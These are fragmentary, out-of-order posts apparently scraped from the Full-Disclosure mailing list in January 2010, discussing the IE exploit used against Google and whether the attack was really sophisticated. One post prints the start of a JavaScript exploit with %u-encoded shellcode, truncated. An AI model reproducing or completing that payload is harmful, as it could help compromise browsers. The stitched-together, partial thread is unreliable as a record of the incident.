Jokes aside has anyone seen this?
http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js
On Mon, Jan 18, 2010 at 1:44 PM, Christian Sciberras uuf6...@gmail.com wrote:
Bipin,
I'm not wise either, at least not when it comes to security, I'm just
still discovering this
Mark, Dan, Smasher, etc. Thanks for the feedback.
I saw the thread this weekend, but I had to wait until today to respond. My
main motivation was to point out that there is no free lunch, and often even
security professionals forget to think critically. It was not meant to be a
thorough
Now, by analyzing the software used in the break-ins against Google
and dozens of other companies, Joe Stewart, a malware specialist with
SecureWorks, a computer security company based in Atlanta, said he
determined the main program used in the attack contained a module
based on an unusual
Wow such depth! Such insight! WOW
-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
Densmore, Todd
Sent: 15. januar 2010 23:34
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] All China
-disclosure-boun...@lists.grok.org.uk] On Behalf Of
Densmore, Todd
Sent: 15. januar 2010 23:34
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] All China, All The Time
Here is my 2 cents on both Google and iiScan
http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive
So, What is the cost of buying a fighter jet? What would be the cost
of hardening windows (say) by default, straight out of Microsoft, with
good defense in depth strategy (or at least an add-on)?
( Sometimes identifying your enemy is more difficult than the battle itself
and sometimes the battle exists
Bipin,
You've got your priorities wrong, and unfortunately many companies are
coming to the same conclusion.
The problem with security is fixing where is needed rather than shout out
this product is secure or hardening.
What I'm talking about; Windows XP came with its own Firewall, but please
Bipin,
I'm not wise either, at least not when it comes to security, I'm just
still discovering this world.
Other than that, I didn't understand a thing of what you said.
Regards,
Christian Sciberras.
On Mon, Jan 18, 2010 at 8:42 PM, Bipin Gautam bipin.gau...@gmail.com wrote:
Christian!
I
On Thursday 14 January 2010 21:49:05 Christian Sciberras wrote:
They used an IE exploit to get in.
The people at *Google* use *IE*?!! Besides, how does an exploit in IE
affect the server?
It would affect a person with login rights to a server.
This wasn't just an attack on Google, btw, it was
My question was mostly rhetorical, I tried to imply the point on why
computers with sensitive information were;
1. not fully up to date (=from the top of my head, the exploit had
several issues in non-standard browser versions?)
2. running internet explorer (=more known as a target, nothing against
No, that was actually configuration description; best of luck finding
our facility.
On Fri, Jan 15, 2010 at 7:42 PM, Benji m...@b3nji.com wrote:
Actually you were boasting, it was irrelevant to have what you have as a
security precaution. In fact, one could argue that you were making your setup
Actually you were boasting, it was irrelevant to have what you have as a
security precaution. In fact, one could argue that you were making your setup
insecure by telling people how you're secured from the get go.
On Fri, Jan 15, 2010 at 6:38 PM, Christian Sciberras uuf6...@gmail.com wrote:
My
I'll put it this way.
I'm an attacker in your network, trying to get access to your most sensitive
information. I've identified the server that stores this information and I'm
looking around for keys/passwords etc etc etc.
Are you saying it wouldn't help me to know that I needed 5 keys, thus
Physical keys. There's like over 100 different keys in the whole
complex... Sure, helpful to know about the needle in a haystack. The
question is, how much is needed to sift through that haystack.
One day evil maid approach is ok, a couple of days evil
technician, possibly, but I doubt anyone
Here is my 2 cents on both Google and iiScan
http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2010/01/15/china-google-and-web-security.aspx
~todd
___
Full-Disclosure - We believe in it.
Charter:
Can you explain how this is sophisticated? It looks to me like most
decent malware samples I've RE'd:
The result: triple encrypted shell code which downloads multiple
encrypted binaries used to drop an encrypted payload on a target machine
which then establishes an encrypted SSL channel to
Todd, have you verified this encryption specifically the statement by McAfee:
One of the malicious programs opened a remote backdoor to the
computer, establishing an encrypted covert channel that masqueraded as
an SSL connection to avoid detection.
I assume by masquerade they mean the fact it is
Here is the expl0it.
htmlscriptvar sc = unescape(
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%u%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
If it's stupid and it works, it isn't stupid.
On Jan 15, 2010, at 11:07 PM, Marc Maiffret m...@marcmaiffret.com
wrote:
Todd, have you verified this encryption specifically the statement
by McAfee:
One of the malicious programs opened a remote backdoor to the
computer, establishing an
Dan, I think the conversation we were having was centered around
McAfee saying this is ultra sophisticated and using descriptions that
are potentially very inaccurate in cases. I do not think anyone is
questioning whether this exploit, being simple or not, was successful.
Obviously it was
With all the hubbub around China yet again, I would like to remind you of the
utilities available at Hammer of God that allow one to completely block any
or all traffic to or from China or any other country in the world via
ISA/TMG.
Source for pre-built blocklists in DNSBL, CIDR, or
Interesting article on zdnet, talking about the targeting of the
lawful intercept system at Google
…they [hackers] apparently were able to access a system used to help
Google comply with search warrants by providing data on Google users,
said a source familiar with the situation, who spoke on
They used an IE exploit to get in. I don't understand Google said that they
used a complex way to access their systems. AFAIK many home users are hacked
daily the same way
On Thu, Jan 14, 2010 at 7:44 PM, Ivan . ivan...@gmail.com wrote:
Interesting article on zdnet, talking about the
They used an IE exploit to get in.
The people at *Google* use *IE*?!! Besides, how does an exploit in IE
affect the server?
On Fri, Jan 15, 2010 at 4:47 AM, James Matthews nytrok...@gmail.com wrote:
They used an IE exploit to get in. I don't understand Google said that they
used a complex way
...@lists.grok.org.uk [mailto:full-
disclosure-boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God)
Sent: Wednesday, January 13, 2010 1:01 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] All China, All The Time
With all the hubbub around China yet again, I would like to remind you
I hate to be picky but
the entire country’s network is a festering cesspool of scum and villainy.
The correct collective noun for scum and villainy is of course 'wretched
hive'.
Regards
-- stuart
(Hammer of God)
Sent: Wednesday, January 13, 2010 1:50 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] All China, All The Time
P.S. The tag line was meant to be funny, but as one kind reply pointed
out, it may be taken the wrong way. If so, and you CAN read
Haha, and the OSX Translate widget's translation:
If you may see this point, did not respond that - I will not obtain it
/me wonders what the Chinese equiv of engrish.com is... 0o
On 1/13/10 10:17 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:
Yikes. More information. The tag was
28 matches